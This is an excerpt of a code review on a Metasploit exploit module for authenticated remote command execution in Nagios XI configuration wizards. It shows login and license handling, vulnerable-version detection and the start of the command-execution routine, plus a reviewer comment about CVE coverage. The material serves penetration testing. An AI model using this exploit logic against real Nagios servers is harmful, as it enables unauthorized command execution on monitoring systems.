modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb

```diff
@@ -0,0 +1,232 @@
+      case login_result
+      when 1..3 # An error occurred
+        return login_result, 'Failed to authenticate to NagiosXI'
+      when 4 # Nagios XI is still not fully installed
+        return 4, 'Failed to install Nagios XI on the target.'
+      when 5
+        auth_cookies, nsp = res_array
+        sign_license_result = sign_license_agreement(auth_cookies, nsp)
+        if sign_license_result
+          return 5, 'Failed to sign license agreement'
+        end
+
+        login_result, res_array = login_after_install_or_license(username, password, finish_install)
+        case login_result
+        when 1..3
+          return login_result, 'Failed to authenticate to NagiosXI'
+        when 4 # Nagios XI is still not fully installed
+          return 4, 'Failed to install Nagios XI on the target.'
+        when 5 # the Nagios XI license agreement still has not been signed
+          return 5, 'Failed to sign the license agreement.'
+        end
+      end
+    end
+    print_good('Successfully authenticated to Nagios XI.')
+
+    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
+    @nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)[0][0]
+
+    # Set the version here so both check and exploit can use it
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
+    end
+
+    print_status("Target is Nagios XI with version #{nagios_version}.")
+
+    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
+      nagios_version = '1.0.0' # Set to really old version as a placeholder.
+    end
+    @version = Rex::Version.new(nagios_version)
+
+    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
+  end
+
+  def check
+    # Authenticate to ensure we can access the NagiosXI version
+    auth_result, err_msg = authenticate
+    if auth_result != 0
+      return CheckCode::Unknown(err_msg)
+    end
+
+    if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check
+      auth_result, err_msg = authenticate
+      if auth_result != 0
+        fail_with(Failure::Unknown, err_msg)
+      end
+    end
+
+    # execute payload based on the selected targeted configuration wizard
+    url_params = {
+      'update' => 1,
+      'nsp' => @nsp
+    }
+    if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.5.7')
+      address_param = 'address'
+    else
+      address_param = 'ip_address' # After version 5.5.7, the field name changes to ip_address
+    end
```

Comment:
This comment might need to be moved to the top where you add a new block explaining that this only affects two CVEs listed here and not CVE-2021-25296. The flow of this makes me think okay we have an "if/else" statement that will affect the rest of these cases however in reality it only affects 2/3 of them. Adding comments here will help clear this up.

Reply:
New comment looks good! Marking resolved